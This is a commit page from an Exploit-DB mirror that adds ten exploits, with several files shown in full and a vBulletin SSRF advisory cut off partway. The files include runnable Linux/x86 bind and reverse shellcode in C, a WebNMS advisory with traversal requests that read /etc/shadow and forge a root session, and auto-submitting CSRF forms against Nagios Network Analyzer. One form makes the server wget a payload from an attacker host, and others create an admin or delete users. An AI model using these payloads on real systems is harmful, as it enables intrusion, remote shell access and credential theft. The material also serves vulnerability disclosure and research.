bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-08-11

Browse source 
10 new exploits

Nagios Network Analyzer 2.2.1 - Multiple CSRF
Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)
Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)
Microsoft Office Word 2007_2010_2013_2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)
vBulletin 5.2.2 - Preauth Server Side Request Forgery (SSRF)
EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation
EyeLock nano NXT 3.5 - Local File Disclosure
EyeLock nano NXT 3.5 - Remote Root Exploit
WebNMS Framework Server 5.2 and 5.2 SP1 - Multiple Vulnerabilities
SAP SAPCAR - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-08-11 05:08:59 +00:00
parent 3b59d25c95
commit 832f9cf8b5
11 changed files with 1609 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -36370,3 +36370,13 @@ id,file,description,date,author,platform,type,port
40218,platforms/php/webapps/40218.txt,"phpCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80 40218,platforms/php/webapps/40218.txt,"phpCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0 40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
40220,platforms/php/webapps/40220.txt,"WordPress Add From Server Plugin < 3.3.2 - (File Upload) CSRF",2016-08-08,"Edwin Molenaar",php,webapps,80 40220,platforms/php/webapps/40220.txt,"WordPress Add From Server Plugin < 3.3.2 - (File Upload) CSRF",2016-08-08,"Edwin Molenaar",php,webapps,80
40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple CSRF",2016-08-10,hyp3rlinx,php,webapps,80
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40224,platforms/windows/dos/40224.txt,"Microsoft Office Word 2007_2010_2013_2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,"Sébastien Morin",windows,dos,0
40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Preauth Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80
40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80
40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80
40229,platforms/jsp/webapps/40229.txt,"WebNMS Framework Server 5.2 and 5.2 SP1 - Multiple Vulnerabilities",2016-08-10,"Pedro Ribeiro",jsp,webapps,0
40230,platforms/linux/dos/40230.txt,"SAP SAPCAR - Multiple Vulnerabilities",2016-08-10,"Core Security",linux,dos,0

Can't render this file because it is too large.

89
platforms/jsp/webapps/40229.txt Executable file
View file

@ -0,0 +1,89 @@
>> Multiple vulnerabilities in WebNMS Framework Server 5.2 and 5.2 SP1
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 04/07/2016 / Last updated: 08/08/2016
>> Background on the affected product:
"WebNMS is an industry-leading framework for building network management applications. With over 25,000 deployments worldwide and in every Tier 1 Carrier, network equipment providers and service providers can customize, extend and rebrand WebNMS as a comprehensive Element Management System (EMS) or Network Management System (NMS).
NOC Operators, Architects and Developers can customize the functional modules to fit their domain and network. Functional modules include Fault Correlation, Performance KPIs, Device Configuration, Service Provisioning and Security. WebNMS supports numerous Operating Systems, Application Servers, and databases."
>> Summary:
WebNMS contains three critical vulnerabilities that can be exploited by an unauthenticated attacker: one directory traversal that can be used to achieve remote code execution, another directory traversal that can be abused to download any text file in the system and the possibility to impersonate any user in the system. In addition, WebNMS also stores the user passwords in a file with a weak obfuscation algorithm that can be easily reversed.
A special thanks to the SecuriTeam Secure Disclosure programme (SSD), which performed the disclosure in a responsible manner to the affected vendor. This advisory can be seen in their blog at https://blogs.securiteam.com/index.php/archives/2712
Metasploit exploits for all vulnerabilities have also been released.
>> Technical details:
#1
Vulnerability: Directory traversal in file upload functionality (leading to remote code execution)
CVE-2016-6600
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. See below for other constraints.
Affected versions: unknown, at least 5.2 and 5.2 SP1
The FileUploadServlet has a directory traversal vulnerability, that allows an unauthenticated attacker to upload a JSP file that executes on the server.
To exploit this vulnerability, simply POST as per the proof of concept below. The directory traversal is in the "fileName" parameter.
POST /servlets/FileUploadServlet?fileName=../jsp/Login.jsp HTTP/1.1
<JSP payload here>
There are two things to keep in mind for the upload to be successful:
- Only text files can be uploaded, binary files will be mangled.
- In order to achieve code execution without authentication, the files need to be dropped in ../jsp/ but they can only have the following names: either Login.jsp or a WebStartXXX.jsp, where XXX is any string of any length.
#2
Vulnerability: Directory traversal in file download functionality
CVE-2016-6601
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. Only text files can be downloaded properly, any binary file will get mangled by the servlet and downloaded incorrectly.
Affected versions: unknown, at least 5.2 and 5.2 SP1
The FetchFile servlet has a directory traversal vulnerability that can be abused by an unauthenticated attacker to download arbitrary files from the WebNMS host. The vulnerable parameter is "fileName" and a proof of concept is shown below.
GET /servlets/FetchFile?fileName=../../../etc/shadow
#3
Vulnerability: Weak obfuscation algorithm used to store passwords
CVE-2016-6602
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker.
Affected versions: unknown, at least 5.2 and 5.2 SP1
The ./conf/securitydbData.xml file (in the WebNMS WEB-INF directory) contains entries with all the usernames and passwords in the server:
<DATA ownername="NULL" password="e8c89O1f" username="guest"/>
<DATA ownername="NULL" password="d7963B4t" username="root"/>
The algorithm used to obfuscate is convoluted but easy to reverse engineer. The passwords above are "guest" for the "guest" user and "admin" for the "root" user. A Metasploit module implementing the deobfuscation algorithm has been released.
This vulnerability can be combined with #2 and allow an unauthenticated attacker to obtain credentials for all user accounts:
GET /servlets/FetchFile?fileName=conf/securitydbData.xml
#4
Vulnerability: User account impersonation / hijacking
CVE-2016-6603
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker.
Affected versions: unknown, at least 5.2 and 5.2 SP1
It is possible to impersonate any user in WebNMS by simply setting the "UserName" HTTP header when making a request, which will return a valid authenticated session cookie. This allows an unauthenticated attacker to impersonate the superuser ("root") and perform administrative actions. The proof of concept is shown below:
GET /servlets/GetChallengeServlet HTTP/1.1
UserName: root
This returns the cookie "SessionId=0033C8CFFE37EB6093849CBA4BF2CAF3;" which is a valid, JSESSIONID cookie authenticated as the "root" user. This can then be used to login to the WebNMS Framework Server by simply setting the cookie and browsing to any page.
>> Fix:
Since the vendor did not respond to any contacts attempted by Beyond Security and its SSD programme, it is not known whether a fixed version of WebNMS Framework Server has been released. It is highly recommended not to expose the server to any untrusted networks (such as the Internet).
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

190
platforms/lin_x86/shellcode/40222.c Executable file
View file

@ -0,0 +1,190 @@
/*
;
; Linux x86
; Author: thryb
; Date: 13-07-16
; Purpose: Bind /bin/zsh to TCP port 9090
; Size: 96 bytes
; ID: SLAE-770
; Git: https://www.github.com/thryb/SLAE-770
;
global _start
section .text
_start:
xor eax, eax ; cleaning registers for sanity
xor ebx, ebx
xor edx, edx
xor edi, edi
; 1 - create socket
; socket(AF_INET, SOCK_STREAM, 0);
; #define SYS_SOCKET 1 // sys_socket(2)
push eax ; null
mov al, 0x66 ; sys_socketcall = 102
mov bl, 0x1 ; socketcall() socket = 1
push byte 0x1 ; stack = 0, 1
push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET)
mov ecx, esp ; mov stack ptr to ecx
int 0x80 ; init
; 2 - Bind port
; bind(fd, (struct sockaddr *) &s_addr, 16);
; #define SYS_BIND 2 // sys_bind(2)
xchg edi, eax ; transfer fd to edi
mov al, 0x66 ; sys_socketcall = 102
pop ebx ; sys_bind = 2
pop esi ; = 1
push edx ; stack = [0]
push word 0x8223 ; stack = [0, port_num]
push word bx ; stack = [0, port_num, 2]
push byte 16 ; stack = [0, port_num, 2], 16
push ecx ; stack = [0, port_num, 2], 16, pointer
push edi ; stack = [0, port_num, 2], 16, *ptr, fd
mov ecx, esp ; move stack ptr to ecx
int 0x80 ; init
; 3 - Listen
; listen(fd, 1);
; #define SYS_LISTEN 4 // sys_listen(2)
pop edx ; save fd
mov al, 0x66 ; sys_socketcall = 102
add bl, 0x2 ; bl + 2 (bl 2 from bind)
int 0x80 ; init
; 4 - Accept
; accept(fd, NULL, NULL);
; #define SYS_ACCEPT 5 // sys_accept(2)
push eax ; 0 - NULL
push eax ; 0 - NULL
mov al, 0x66 ; sys_socketcall = 102
inc ebx ; make 5 for listen (4 from listen)
push edx ; push fd on stack
mov ecx, esp ; move stack ptr to ecx
int 0x80 ; init
; 5 - dup
; sys_dup2 = 63 = 0x3f
xchg eax, ebx ; ebx = fd / eax = 5
xor ecx, ecx ; NULL ecx
add cl, 0x2 ; add 2 to counter
dup2: ; STDIN, STDOUT, STDERR
mov al, 0x3f ; sys_dup2
int 0x80 ; init
dec cl ; decrement counter
jns dup2 ; Jump on No Sign (Positive)
; 6 - execve /bin/zsh
; normal execve shell exec
push eax
push 0x68737a2f ; hsz/
push 0x6e69622f ; nib/
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 0xb ; sys_execve (11)
int 0x80 ; init
============================================================================================================
No NULL
./bind-sh-tcp-9090: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 31 db xor %ebx,%ebx
8048064: 31 d2 xor %edx,%edx
8048066: 31 ff xor %edi,%edi
8048068: 50 push %eax
8048069: b0 66 mov $0x66,%al
804806b: b3 01 mov $0x1,%bl
804806d: 6a 01 push $0x1
804806f: 6a 02 push $0x2
8048071: 89 e1 mov %esp,%ecx
8048073: cd 80 int $0x80
8048075: 97 xchg %eax,%edi
8048076: b0 66 mov $0x66,%al
8048078: 5b pop %ebx
8048079: 5e pop %esi
804807a: 52 push %edx
804807b: 66 68 23 82 pushw $0x8223
804807f: 66 53 push %bx
8048081: 6a 10 push $0x10
8048083: 51 push %ecx
8048084: 57 push %edi
8048085: 89 e1 mov %esp,%ecx
8048087: cd 80 int $0x80
8048089: 5a pop %edx
804808a: b0 66 mov $0x66,%al
804808c: 80 c3 02 add $0x2,%bl
804808f: cd 80 int $0x80
8048091: 50 push %eax
8048092: 50 push %eax
8048093: b0 66 mov $0x66,%al
8048095: 43 inc %ebx
8048096: 52 push %edx
8048097: 89 e1 mov %esp,%ecx
8048099: cd 80 int $0x80
804809b: 93 xchg %eax,%ebx
804809c: 31 c9 xor %ecx,%ecx
804809e: 80 c1 02 add $0x2,%cl
080480a1 <dup2>:
80480a1: b0 3f mov $0x3f,%al
80480a3: cd 80 int $0x80
80480a5: fe c9 dec %cl
80480a7: 79 f8 jns 80480a1 <dup2>
80480a9: 50 push %eax
80480aa: 68 2f 7a 73 68 push $0x68737a2f
80480af: 68 2f 62 69 6e push $0x6e69622f
80480b4: 89 e3 mov %esp,%ebx
80480b6: 50 push %eax
80480b7: 89 e2 mov %esp,%edx
80480b9: 53 push %ebx
80480ba: 89 e1 mov %esp,%ecx
80480bc: b0 0b mov $0xb,%al
80480be: cd 80 int $0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xd2\x31\xff\x50\xb0\x66\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\xb0\x66\x5b\x5e\x52\x66\x68"
// ==== Port ====
"\x23\x82"
// ==============
"\x66\x53\x6a\x10\x51\x57\x89\xe1\xcd\x80\x5a\xb0\x66\x80\xc3\x02\xcd\x80\x50\x50\xb0\x66\x43\x52\x89\xe1\xcd\x80\x93\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

158
platforms/lin_x86/shellcode/40223.c Executable file
View file

@ -0,0 +1,158 @@
/*
;
; Linux x86
; Author: thryb
; Date: 21-07-16
; Purpose: Reverse /bin/zsh to TCP port 9090
; Size: 80 bytes
; ID: SLAE-770
; Git: https://www.github.com/thryb/SLAE-770
;
global _start
section .text
_start:
xor eax, eax ; cleaning registers
xor ebx, ebx
; 1 - create socket
; socket(AF_INET, SOCK_STREAM, 0);
; #define SYS_SOCKET 1 // sys_socket(2)
push eax ; null terminate
push byte 0x1 ; stack = 0, 1
push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET)
mov al, 0x66 ; sys_socketcall = 102
mov bl, 0x1 ; socketcall() socket = 1
mov ecx, esp ; mv stack ptr into ecx
int 0x80 ; init
xchg esi, eax ; saving sockfd
; 2 - Connect
; connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));
mov al, 0x66 ; sys_socketcall = 102
add ebx, 0x2 ; sys_connect = 3
push 0xefffff7f ; 127.255.255.254 (ip2shell.py)
push word 0x8223 ; 9090 (port2shell.py)
push word 0x2 ; 2 AF_INET
mov ecx, esp ; mv stack ptr to ecx
push 0x10 ; addr leght 16
push ecx ; ptr address
push esi ; fd
mov ecx, esp ; mv final stack ptr to ecx
int 0x80 ; init
xchg eax, esi ; save sockfd
; 3 - dup
; sys_dup2 = 63 = 0x3f
xor ecx, ecx ; NULL ecx
add cl, 0x2 ; add 2 to counter
dup2: ; STDIN, STDOUT, STDERR
mov al, 0x3f ; sys_dup2
int 0x80 ; init
dec cl ; decrement counter
jns dup2 ; Jump on No Sign (Positive)
; 4 - execve /bin/zsh
; normal execve shell exec
push eax ; null
push 0x68737a2f ; hsz/
push 0x6e69622f ; nib/
mov ebx, esp ; mv stack ptr to ebx
push eax ; null
push ebx ; push ptr addr
mov ecx, esp ; mv new stack ptr to ecx
mov al, 0xb ; sys_execve (11)
int 0x80 ; init
============================================================================================================
No NULL
./reverse-zsh-tcp-9090.bin: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 31 db xor %ebx,%ebx
8048064: 50 push %eax
8048065: 6a 01 push $0x1
8048067: 6a 02 push $0x2
8048069: b0 66 mov $0x66,%al
804806b: b3 01 mov $0x1,%bl
804806d: 89 e1 mov %esp,%ecx
804806f: cd 80 int $0x80
8048071: 96 xchg %eax,%esi
8048072: b0 66 mov $0x66,%al
8048074: 83 c3 02 add $0x2,%ebx
8048077: 68 7f ff ff ef push $0xefffff7f
804807c: 66 68 23 82 pushw $0x8223
8048080: 66 6a 02 pushw $0x2
8048083: 89 e1 mov %esp,%ecx
8048085: 6a 10 push $0x10
8048087: 51 push %ecx
8048088: 56 push %esi
8048089: 89 e1 mov %esp,%ecx
804808b: cd 80 int $0x80
804808d: 96 xchg %eax,%esi
804808e: 31 c9 xor %ecx,%ecx
8048090: 80 c1 02 add $0x2,%cl
08048093 <dup2>:
8048093: b0 3f mov $0x3f,%al
8048095: cd 80 int $0x80
8048097: fe c9 dec %cl
8048099: 79 f8 jns 8048093 <dup2>
804809b: 50 push %eax
804809c: 68 2f 7a 73 68 push $0x68737a2f
80480a1: 68 2f 62 69 6e push $0x6e69622f
80480a6: 89 e3 mov %esp,%ebx
80480a8: 50 push %eax
80480a9: 53 push %ebx
80480aa: 89 e1 mov %esp,%ecx
80480ac: b0 0b mov $0xb,%al
80480ae: cd 80 int $0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x31\xdb\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x96\xb0\x66\x83\xc3\x02\x68"
// Replace IP here (use ip2shell.py to generate IP).
"\x7f\xff\xff\xef"
// *****************
"\x66\x68"
// Replace port here (use port2shell.py to generate IP).
"\x23\x82"
// *****************
"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x96\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

142
platforms/linux/dos/40230.txt Executable file
View file

@ -0,0 +1,142 @@
1. Advisory Information
Title: SAP CAR Multiple Vulnerabilities
Advisory ID: CORE-2016-0006
Advisory URL: http://www.coresecurity.com/advisories/sap-car-multiple-vulnerabilities
Date published: 2016-08-09
Date of last update: 2016-08-09
Vendors contacted: SAP
Release mode: Coordinated release
2. Vulnerability Information
Class: Unchecked Return Value [CWE-252], TOCTOU Race Condition [CWE-367]
Impact: Denial of service, Security bypass
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2016-5845, CVE-2016-5847
3. Vulnerability Description
SAP [1] distributes software and packages using an archive program called SAPCAR. This program uses a custom archive file format. Vulnerabilities were found in the extraction of specially crafted archive files, that could lead to local denial of service conditions or privilege escalation.
4. Vulnerable Packages
SAPCAR archive tool
Other products and versions might be affected, but they were not tested.
5. Vendor Information, Solutions and Workarounds
SAP published the following Security Notes:
2312905
2327384
6. Credits
This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
7. Technical Description / Proof of Concept Code
SAP distributes software and packages using an archive program called SAPCAR. This program uses a custom archive file format. Vulnerabilities were found in the extraction of specially crafted archive files, that could lead to denial of service conditions or escalation of privileges.
The code that handles the extraction of archive files is prone to privilege escalation and denial of service vulnerabilities.
7.1. Denial of service via invalid file names
[CVE-2016-5845] Denial of service vulnerability due the SAPCAR program not checking the return value of file operations when extracting files. This might result in the program crashing when trying to extract files from an specially crafted archive file that contains invalid file names for the target platform. Of special interest are applications or solutions that makes use of SAPCAR in an automated way.
The following is a proof of concept to demonstrate the vulnerability:
$ xxd SAPCAR_crash.SAR
0000000: 4341 5220 322e 3031 4452 0081 0000 0f00 CAR 2.01DR......
0000010: 0000 0000 0000 0000 0000 d4f8 e555 0000 .............U..
0000020: 0000 0000 0000 0000 1000 696e 7075 742d ..........input-
0000030: 6469 722f 696e 7090 7400 4544 1a00 0000 dir/inp.t.ED....
0000040: 0f00 0000 121f 9d02 7bc1 23b9 a90a 25a9 ........{.#...%.
0000050: 1525 0a69 9939 a95c 0000 857f b95a .%.i.9.\.....Z
$ ./SAPCAR -dvf SAPCAR_crash.SAR
SAPCAR: processing archive SAPCAR_crash.SAR (version 2.01)
d input-dir/inp#t
SAPCAR: checksum error in input-dir/inp#t (error 12). No such file or director
$ ./SAPCAR -xvf SAPCAR_crash.SAR
SAPCAR: processing archive SAPCAR_crash.SAR (version 2.01)
x input-dir/inp#t
Segmentation fault
7.2. Race condition on permission change
[CVE-2016-5847] Race condition vulnerability due to the way the SAPCAR program change the permissions of extracted files. If a malicious local user has access to a directory where a user is extracting files using SAPCAR, the attacker might use this vulnerability to change the permissions of arbitrary files belonging to the user.
The SAPCAR program writes the file being extracted and after closing it, the program changes the permissions to the ones set on the archive file. There's a time gap between the creating of the file and the change of the permissions. During this time frame, a malicious local user can replace the extracted file with a hard link to a file belonging to another user, resulting in the SAPCAR program changing the permissions on the hard-linked file to be the same as that of the compressed file.
The following is a proof of concept to demonstrate the vulnerability:
$ xxd SAPCAR_race_condition.SAR
0000000: 4341 5220 322e 3031 5247 b481 0000 2b00 CAR 2.01RG....+.
0000010: 0000 0000 0000 0000 0000 d023 5e56 0000 ...........#^V..
0000020: 0000 0000 0000 0000 1000 7465 7374 5f73 ..........test_s
0000030: 7472 696e 672e 7478 7400 4544 3500 0000 tring.txt.ED5...
0000040: 2b00 0000 121f 9d02 7b21 19a9 0a85 a599 +.......{!......
0000050: c9d9 0a49 45f9 e579 0a69 f915 0a59 a5b9 ...IE..y.i...Y..
0000060: 05c5 0af9 65a9 450a 2540 e99c c4aa 4a85 ....e.E.%@....J.
0000070: 94fc 7400 0008 08c6 b9 ..t......
$ ./SAPCAR -tvf SAPCAR_race_condition.SAR
SAPCAR: processing archive SAPCAR_race_condition.SAR (version 2.01)
-rw-rw-r-- 43 01 Dec 2015 19:48 test_string.txt
$ strace ./SAPCAR -xvf SAPCAR_race_condition.SAR
execve("./SAPCAR", ["./SAPCAR", "-xvf", "SAPCAR_race_condition.SAR"], [/* 76 vars */]) = 0
[..]
open("test_string.txt", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
mmap(NULL, 323584, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f98c4704000
fstat(4, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f98c475c000
write(4, "The quick brown fox jumps over t"..., 43) = 43
close(4) = 0
munmap(0x7f98c475c000, 4096) = 0
utime("test_string.txt", [2015/12/01-19:48:48, 2015/12/01-19:48:48]) = 0
chmod("test_string.txt", 0664) = 0
[..]
8. Report Timeline
2016-04-21: Core Security sent an initial notification to SAP.
2016-04-22: SAP confirmed the reception of the email and requested the draft version of the advisory.
2016-04-22: Core Security sent SAP a draft version of the advisory and informed them we would adjust our publication schedule according with the release of a solution to the issues.
2016-04-25: SAP confirmed the reported vulnerabilities and assigned the following security incident tickets IDs: 1670264798, 1670264799 and 1670264800.
2016-05-10: Core Security asked SAP if they had a tentative date for publishing the security fixes.
2016-05-20: SAP informed Core Security they have a tentative release date on July 12th, 2016 (July Patch day).
2016-05-23: Core Security thanked SAP for the tentative date and informed them we would publish our security advisory accordingly upon their confirmation.
2016-06-27: Core Security requested SAP the tentative security notes numbers and links in order to add them to our security advisory.
2016-07-05: SAP informed Core Security they due to some issues found during their testing phase of the patches they were not in a position to ship the patches as part of their July patch day. They said they would be able to ship the patches with August patch day.
2016-07-06: Core Security requested SAP the specific day in August they planed to release the patches.
2016-07-20: Core Security requested again SAP the specific day in August they planed to release the patches.
2016-07-21: SAP informed Core Security they would publish their security notes on the 9th of August.
2016-08-10: Advisory CORE-2016-0006 published.
9. References
[1] http://go.sap.com/.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
11. About Core Security
Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the companys strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Securitys analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2016 Core Security and (c) 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

149
platforms/php/webapps/40221.txt Executable file
View file

@ -0,0 +1,149 @@
[+] Credits: John Page ( hyp3rlinx )
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-MULTIPLE-CSRF.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.nagios.com
Product:
==============================
Nagios Network Analyzer v2.2.1
Netflow Analysis, Monitoring, and Bandwidth Utilization Software
Network Analyzer provides an in-depth look at all network traffic sources
and potential security threats allowing system
admins to quickly gather high-level information regarding the health of the
network as well as highly granular data for
complete and thorough network analysis.
Vulnerability Type:
=================================
Cross Site Request Forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Nagios NA has multiple CSRF vectors, allowing unauthorized commands to be
transmitted from a user that the website trusts if that user is
authenticated and visits a malicious webpage or clicks a attacker supplied
link. The Nagios system can be compromised as remote attackers
can create arbitrary commands e.g. using "wget" to download RCE files onto
the system, create arbitrary Admins, delete users, and conduct
DOS attacks.
Exploit code(s):
================
1) Create arbitrary commands
<form action="
http://victim-server/nagiosna/index.php/api/system/create_command"
method="post">
<input type="hidden" name="name" value="pwn">
<input type="hidden" name="location" value="%2Fusr%2Fbin%2Fwget">
<input type="hidden" name="script" value="wget">
<input type="hidden" name="args"
value="http%3A%2F%2Fattacker-server%2FRCE.php">
<script>document.forms[0].submit()</script>
</form>
2) Add Admin
<form action="http://victim-server/nagiosna/index.php/admin/users/create"
method="post" accept-charset="utf-8">
<input type="text" name="first_name" value="CSRF">
<input type="text" name="last_name" value="ME">
<input type="text" name="company" value="PWN">
<input type="text" name="email" value="evil@abyss.com">
<input type="text" name="phone" value="">
<input type="text" name="username" value="HYP3RLINX">
<input type="password" name="password" value="abc123">
<input type="password" name="password2" value="abc123">
<input type="hidden" name="language" value="default" >
<input type="hidden" name="account_type" id="account_type" value="local">
<input type="hidden" name="ldap_server" id="ldap_server">
<input type="hidden" name="ad_server" id="ad_server" value="1">
<input type="text" name="ad_username" id="ad_username">
<input type="text" name="dn" placeholder="cn=John Smith,dn=nagios,dc=com">
<input type="radio" name="group" value="1" checked="true" >
<input type="radio" name="apiaccess" value="1" >
<input type="radio" name="apiaccess" value="0" checked>
<script>document.forms[0].submit()</script>
</form>
3) Delete reports (report ID must be known or guessed)
<form action="http://victim-server/nagiosna/index.php/api/reports/delete"
method="post">
<input type="hidden" name="q[rid]" value="9">
<script>document.forms[0].submit()</script>
</form>
4) DOS
<form action="http://victim-server/nagiosna/index.php/api/system/stop"
method="post">
<input type="hidden" name="sid" value="1">
<script>//document.forms[0].submit()</script>
</form>
5) Delete users (user ID must be known or guessed)
<form action="http://victim-server/nagiosna/index.php/admin/users/delete"
method="post">
<input type="hidden" name="id" value="10">
<script>document.forms[0].submit()</script>
</form>
Disclosure Timeline:
======================================
Vendor Notification: July 20, 2016
Vendor Acknowledgement: July 21, 2016
Vendor Fix / Release: August 1, 2016
August 8, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX

524
platforms/php/webapps/40225.py Executable file
View file

@ -0,0 +1,524 @@
'''
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com
- CVE-2016-6483
- Release date: 05.08.2016
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
vBulletin <= 5.2.2 Preauth Server Side Request Forgery (SSRF)
vBulletin <= 4.2.3
vBulletin <= 3.8.9
II. BACKGROUND
-------------------------
vBulletin (vB) is a proprietary Internet forum software package developed by
vBulletin Solutions, Inc., a division of Internet Brands.
https://www.vbulletin.com/
https://en.wikipedia.org/wiki/VBulletin
A google search for "Powered by vBulletin" returns over 19 million sites
that are hosting a vBulletin forum:
https://www.google.co.uk/?gws_rd=ssl#q=%22Powered+by+vBulletin%22
III. INTRODUCTION
-------------------------
vBulletin forum software is affected by a SSRF vulnerability that allows
unauthenticated remote attackers to access internal services (such as mail
servers, memcached, couchDB, zabbix etc.) running on the server hosting
vBulletin as well as services on other servers on the local network that are
accessible from the target.
This advisory provides a PoC exploit that demonstrates how an unauthenticated
attacker could perform a port scan of the internal services as well as execute
arbitrary system commands on a target vBulletin host with a locally installed
Zabbix Agent monitoring service.
IV. DESCRIPTION
-------------------------
vBulletin allows forum users to share media fiels by uploading them to the
remote server. Some pages allow users to specify a URL to a media file
that a user wants to share which will then be retrieved by vBulletin.
The user-provided links are validated to make sure that users can only access
resources from HTTP/HTTPS protocols and that connections are not allowed in to
the localhost.
